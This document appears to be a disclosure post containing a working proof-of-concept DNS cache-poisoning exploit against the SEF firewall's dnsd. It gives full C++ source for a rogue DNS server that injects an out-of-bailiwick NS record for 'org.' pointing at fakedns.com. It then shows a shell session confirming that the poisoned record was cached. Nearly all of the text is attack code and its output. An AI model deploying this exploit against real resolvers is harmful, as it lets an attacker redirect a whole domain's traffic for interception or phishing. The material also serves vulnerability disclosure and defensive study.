PoC poisoning cache attack SEF 8 and later

#########################################################
# Begin poc.cpp
#########################################################

// PoC poisoning cache attack SEF 8 and later (by fryxar)
// Requires poslib 1.0.4 library
// Compile: g++ `poslib-config --libs --cflags --server` poc.cpp -o poc

#define POS_DEFAULTLOG
#define POS_DEFAULTLOG_STDERR
#define POS_DEFAULTLOG_SYSLOG

// Server include file
#include <poslib/server/server.h>

// For signal handling
#include <stdlib.h>
#include <signal.h>

char *dyndomain;

DnsMessage *my_handle_query(pending_query *query);

void cleanup(int sig) {
// close down the server system
pos_setquitflag();
}

int main(int argc, char **argv) {
_addr a;

try {
  /* get command-line arguments */
  if (argc != 2 ) {
    printf( "Usage: %s [domainname]/n", argv[0] );
    return 1;
  } else {
    dyndomain = argv[1];
    txt_to_addr(&a, "any");
  }

  poslib_config_init();

  /* bring up posadis */
  servers.push_front(ServerSocket(ss_udp, udpcreateserver(&a)));

  // use the posadis logging system
  pos_log(context_none, log_info, "Proof of concept DNS server starting
up...");

  // set signal handlers
  signal(SIGINT, cleanup);
  signal(SIGTERM, cleanup);

  // set query function
  handle_query = my_handle_query;

  // run server
  posserver_run();
} catch (PException p) {
  printf("Fatal exception: %s/n", p.message);
  return 1;
}

return 0;
}

/* the entry function which will handle all queries */
DnsMessage *my_handle_query(pending_query *query) {
DnsMessage *a = new DnsMessage();
DnsQuestion q;
DnsRR rr;

/* set a as an answer to the query */
a->ID = query->message->ID;
a->RD = query->message->RD;
a->RA = false;

if (query->message->questions.begin() ==
query->message->questions.end()) {
  /* query did not contain question */
  a->RCODE = RCODE_QUERYERR;
  return a;
}
q = *query->message->questions.begin();
a->questions.push_back(q);
a->QR = true;

pos_log(context_server, log_info, "Query: [%s,%s]", q.QNAME.tocstr(),
str_qtype(q.QTYPE).c_str());

if (q.QTYPE == DNS_TYPE_A && q.QNAME == dyndomain) {
  rr = DnsRR(dyndomain, DNS_TYPE_A, CLASS_IN, 3600);
  string data = rr_fromstring(DNS_TYPE_A, "200.200.200.200"); //
Anything...
  rr.RDLENGTH = data.size();
  rr.RDATA = (char *)memdup(data.c_str(), data.size());
  a->answers.push_back(rr);

  rr = DnsRR("org", DNS_TYPE_NS, CLASS_IN, 3600);
  data = rr_fromstring(DNS_TYPE_NS, "fakedns.com");
  rr.RDLENGTH = data.size();
  rr.RDATA = (char *)memdup(data.c_str(), data.size());
  a->authority.push_back(rr);

  rr = DnsRR("fakedns.com", DNS_TYPE_A, CLASS_IN, 3600);
  data = rr_fromstring(DNS_TYPE_A, "200.200.200.201"); // Anything...
  rr.RDLENGTH = data.size();
  rr.RDATA = (char *)memdup(data.c_str(), data.size());
  a->additional.push_back(rr);
} else {
  /* we don't want this */
  a->RCODE = RCODE_SRVFAIL;
}
return a;
}
#########################################################
# End poc.cpp
#########################################################


fryxar.afraid.org # ./poc fryxar.afraid.org

    and now, in your SEF Firewall:

firewall # kill `ps -ef | awk '/[d]nsd/ { print $2 }'` # Cleaning the
cache

firewall # nslookup afraid.org 127.0.0.1  # Caching org. NS
Server:  localhost
Address:  127.0.0.1

Non-authoritative answer:
Name:    afraid.org
Addresses:  69.42.89.56, 69.42.89.53, 69.42.89.55, 69.42.89.54

firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump

firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached
"org." NS
org.
  172775      NS TLD2.ULTRADNS.NET.
  172775      NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.

firewall # nslookup fryxar.afraid.org 127.0.0.1 # Domain owned by my
poisoned DNS
Server:  localhost
Address:  127.0.0.1

Non-authoritative answer:
Name:    fryxar.afraid.org
Address:  200.200.200.200

firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump

firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached
"org." NS
org.
    3567      NS fakedns.com.           <- Ooohh!
    3567      NS TLD2.ULTRADNS.NET.
    3567      NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.

    And now SEF "thinks" that fakedns.com server is an authoritative
nameserver of "org." domain, learned by fryxar.afraid.org DNS server
that is only authoritative for the fryxar.afraid.org domain.
--
fryxar <fryxar@datafull.com> 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值